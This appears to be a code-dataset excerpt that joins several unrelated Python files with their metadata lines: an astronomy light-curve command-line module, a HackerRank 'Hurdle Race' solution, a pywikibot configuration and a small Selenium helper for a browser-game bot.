log.info("Saving light curve to %s" % outfile)
save_lcurve(lc, outfile)
return [outfile]
def lcurve_from_txt(
txt_file, outfile=None, noclobber=False, outdir=None, mjdref=None, gti=None
):
"""
Load a lightcurve from a text file.
Parameters
----------
txt_file : str
File name of the input light curve in text format. Assumes two columns:
time, counts. Times are seconds from MJDREF 55197.00076601852 (NuSTAR)
if not otherwise specified.
Returns
-------
outfile : [str]
Returned as a list with a single element for consistency with
`lcurve_from_events`
Other Parameters
----------------
outfile : str
Output file name
noclobber : bool
If True, do not overwrite existing files
mjdref : float, default 55197.00076601852
the MJD time reference
gti : [[gti0_0, gti0_1], [gti1_0, gti1_1], ...]
Good Time Intervals
"""
import numpy as np
if mjdref is None:
mjdref = np.longdouble("55197.00076601852")
outfile = assign_value_if_none(outfile, hen_root(txt_file) + "_lc")
outfile = outfile.replace(HEN_FILE_EXTENSION, "") + HEN_FILE_EXTENSION
outdir = assign_value_if_none(
outdir, os.path.dirname(os.path.abspath(txt_file))
)
_, outfile = os.path.split(outfile)
mkdir_p(outdir)
outfile = os.path.join(outdir, outfile)
if noclobber and os.path.exists(outfile):
warnings.warn(
"File exists, and noclobber option used. Skipping",
AstropyUserWarning,
)
return [outfile]
time, counts = np.genfromtxt(txt_file, delimiter=" ", unpack=True)
time = np.array(time, dtype=np.longdouble)
counts = np.array(counts, dtype=float)
lc = Lightcurve(time=time, counts=counts, gti=gti, mjdref=mjdref)
lc.instr = "EXTERN"
log.info("Saving light curve to %s" % outfile)
save_lcurve(lc, outfile)
return [outfile]
def _baseline_lightcurves(lcurves, outroot, p, lam):
outroot_save = outroot
for i, f in enumerate(lcurves):
if outroot is None:
outroot = hen_root(f) + "_lc_baseline"
else:
outroot = outroot_save + "_{}".format(i)
ftype, lc = get_file_type(f)
baseline = lc.baseline(p, lam)
lc.base = baseline
save_lcurve(lc, outroot + HEN_FILE_EXTENSION)
def _wrap_lc(args):
f, kwargs = args
try:
return lcurve_from_events(f, **kwargs)
except Exception as e:
warnings.warn("HENlcurve exception: {0}".format(str(e)))
raise
def _wrap_txt(args):
f, kwargs = args
try:
return lcurve_from_txt(f, **kwargs)
except Exception as e:
warnings.warn("HENlcurve exception: {0}".format(str(e)))
return []
def _wrap_fits(args):
f, kwargs = args
try:
return lcurve_from_fits(f, **kwargs)
except Exception as e:
warnings.warn("HENlcurve exception: {0}".format(str(e)))
return []
def _execute_lcurve(args):
from multiprocessing import Pool
bintime = args.bintime
safe_interval = args.safe_interval
e_interval, pi_interval = args.energy_interval, args.pi_interval
if args.pi_interval is not None:
pi_interval = np.array(args.pi_interval)
if e_interval is not None:
args.e_interval = np.array(args.energy_interval)
# ------ Use functools.partial to wrap lcurve* with relevant keywords---
if args.fits_input:
wrap_fun = _wrap_fits
argdict = {"noclobber": args.noclobber}
elif args.txt_input:
wrap_fun = _wrap_txt
argdict = {"noclobber": args.noclobber}
else:
wrap_fun = _wrap_lc
argdict = {
"noclobber": args.noclobber,
"safe_interval": safe_interval,
"pi_interval": pi_interval,
"e_interval": e_interval,
"min_length": args.minlen,
"gti_split": args.gti_split,
"ignore_gtis": args.ignore_gtis,
"bintime": bintime,
"outdir": args.outdir,
"deorbit_par": args.deorbit_par,
}
arglist = [[f, argdict.copy()] for f in args.files]
na = len(arglist)
outfile = args.outfile
if outfile is not None:
outname = os.path.splitext(outfile)[0]
for i in range(na):
if na > 1:
outname = outfile + "_{0}".format(i)
arglist[i][1]["outfile"] = outname
# -------------------------------------------------------------------------
outfiles = []
if os.name == "nt" or args.nproc == 1:
for a in arglist:
outfiles.append(wrap_fun(a))
else:
pool = Pool(processes=args.nproc)
for i in pool.imap_unordered(wrap_fun, arglist):
outfiles.append(i)
pool.close()
log.debug(f"{outfiles}")
if args.scrunch:
scrunch_lightcurves(outfiles)
if args.join:
join_lightcurves(outfiles)
def main(args=None):
"""Main function called by the `HENlcurve` command line script."""
import argparse
from .base import _add_default_args, check_negative_numbers_in_args
description = (
"Create lightcurves starting from event files. It is "
"possible to specify energy or channel filtering options"
)
parser = argparse.ArgumentParser(description=description)
parser.add_argument("files", help="List of files", nargs="+")
parser.add_argument(
"-b",
"--bintime",
type=float,
default=1,
help="Bin time; if negative, negative power of 2",
)
parser.add_argument(
"--safe-interval",
nargs=2,
type=float,
default=[0, 0],
help="Interval at start and stop of GTIs used" + " for filtering",
)
parser = _add_default_args(parser, ["energies", "pi"])
parser.add_argument(
"-s",
"--scrunch",
help="Create scrunched light curve (single channel)",
default=False,
action="store_true",
)
parser.add_argument(
"-j",
"--join",
help="Create joint light curve (multiple channels)",
default=False,
action="store_true",
)
parser.add_argument(
"-g",
"--gti-split",
help="Split light curve by GTI",
default=False,
action="store_true",
)
parser.add_argument(
"--minlen",
help="Minimum length of acceptable GTIs (default:4)",
default=4,
type=float,
)
parser.add_argument(
"--ignore-gtis", help="Ignore GTIs", default=False, action="store_true"
)
parser.add_argument(
"-d", "--outdir", type=str, default=None, help="Output directory"
)
parser.add_argument(
"--noclobber",
help="Do not overwrite existing files",
default=False,
action="store_true",
)
parser.add_argument(
"--fits-input",
help="Input files are light curves in FITS format",
default=False,
action="store_true",
)
parser.add_argument(
"--txt-input",
help="Input files are light curves in txt format",
default=False,
action="store_true",
)
parser = _add_default_args(
parser, ["deorbit", "output", "loglevel", "debug", "nproc"]
)
args = check_negative_numbers_in_args(args)
args = parser.parse_args(args)
if args.debug:
args.loglevel = "DEBUG"
log.setLevel(args.loglevel)
with log.log_to_file("HENlcurve.log"):
_execute_lcurve(args)
def scrunch_main(args=None):
"""Main function called by the `HENscrunchlc` command line script."""
import argparse
description = "Sum lightcurves from different instruments or energy ranges"
parser = argparse.ArgumentParser(description=description)
parser.add_argument("files", help="List of files", nargs="+")
parser.add_argument(
"-o",
"--out",
type=str,
default="out_scrlc" + HEN_FILE_EXTENSION,
help="Output file",
)
parser.add_argument(
"--loglevel",
help=(
"use given logging level (one between INFO, "
"WARNING, ERROR, CRITICAL, DEBUG; "
"default:WARNING)"
),
default="WARNING",
type=str,
)
parser.add_argument(
"--debug",
help="use DEBUG logging level",
default=False,
action="store_true",
)
args = parser.parse_args(args)
files = args.files
if args.debug:
args.loglevel = "DEBUG"
log.setLevel(args.loglevel)
with log.log_to_file("HENscrunchlc.log"):
scrunch_lightcurves(files, args.out)
def baseline_main(args=None):
"""Main function called by the `HENbaselinesub` command line script."""
import argparse
description = (
"Subtract a baseline from the lightcurve using the Asymmetric Least "
"Squares algorithm. The two parameters p and lambda control the "
"asymmetry and smoothness of the baseline. See below for details."
)
parser = argparse.ArgumentParser(description=description)
parser.add_argument("files", help="List of files", nargs="+")
parser.add_argument(
"-o", "--out", type=str, default=None, help="Output file"
)
parser.add_argument(
"--loglevel",
help=(
"use given logging level (one between INFO, "
"WARNING, ERROR, CRITICAL, DEBUG; "
"default:WARNING)"
),
default="WARNING",
type=str,
)
parser.add_argument(
"--debug",
help="use DEBUG logging level",
default=False,
action="store_true",
)
parser.add_argument(
"-p",
"--asymmetry",
type=float,
help='"asymmetry" parameter. Smaller values make the '
'baseline more "horizontal". Typically '
"0.001 < p < 0.1, but not necessarily.",
default=0.01,
)
parser.add_argument(
"-l",
"--lam",
type=float,
help='lambda, or "smoothness", parameter. Larger'
" values make the baseline stiffer. Typically "
"1e2 < lam < 1e9",
default=1e5,
)
args = parser.parse_args(args)
files = args.files
if args.debug:
args.loglevel = "DEBUG"
log.setLevel(args.loglevel)
with log.log_to_file("HENbaseline.log"):
_baseline_lightcurves(files, args.out, args.asymmetry, args.lam)
| 1.96875 | 2 |
solution/practice/algorithms/implementation/TheHurdleRace/solution.py | satyam857/HackerRank | 0 | 12762548 | <gh_stars>0
#!/bin/python3
import sys
def hurdleRace(k, height):
temp = max(height)-k
if (temp > 0):
return temp
else:
return 0
if __name__ == "__main__":
n, k = input().strip().split(' ')
n, k = [int(n), int(k)]
height = list(map(int, input().strip().split(' ')))
result = hurdleRace(k, height)
print(result)
| 3.546875 | 4 |
pywikibot/.pywikibot/user-config.py | Arkanosis/Arkonf | 13 | 12762549 | mylang='fr'
family = 'wikipedia'
usernames['wikipedia']['fr']=u'Arktest'
console_encoding = 'utf-8'
| 1.25 | 1 |
src/util_game.py | aescarcha/king-bot | 0 | 12762550 | <reponame>aescarcha/king-bot<gh_stars>0
from .custom_driver import client
from .utils import log
def close_modal(browser: client):
el = browser.find("//div[@class='modalContent']")
el = el.find_element_by_xpath(".//a[@class='closeWindow clickable']")
browser.click(el)
def close_welcome_screen(browser: client):
wc = browser.find("//div[contains(@class, 'welcomeScreen')]")
log("closing welcome-screen")
el = wc.find_element_by_xpath(
".//a[@class='closeWindow clickable']")
browser.click(el)
| 2.390625 | 2 |